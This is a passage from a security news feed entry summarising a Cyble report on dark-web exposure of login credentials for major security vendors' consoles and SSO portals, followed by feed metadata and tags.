the credentials were valid, but many were for easily accessible web console interfaces, SSO logins, and other web-facing account access points. The vendors Cyble looked at included a range of network and cloud security providers, including some of the biggest makers of SIEM systems, EDR tools, and firewalls. All have had data exposures just since the start of the year that ideally were addressed quickly, or at least required additional authentication steps for access. One of the largest security vendors Cyble looked at may have more sensitive accounts exposed, as company email addresses are listed among the credentials for]]> 2025-01-22T08:12:57+00:00 https://cyble.com/blog/thousands-of-security-vendor-credentials-found-on-dark-web/ www.secnews.physaphae.fr/article.php?IdArticle=8642107 False Ransomware,Tool,Vulnerability,Threat,Cloud None 3.0000000000000000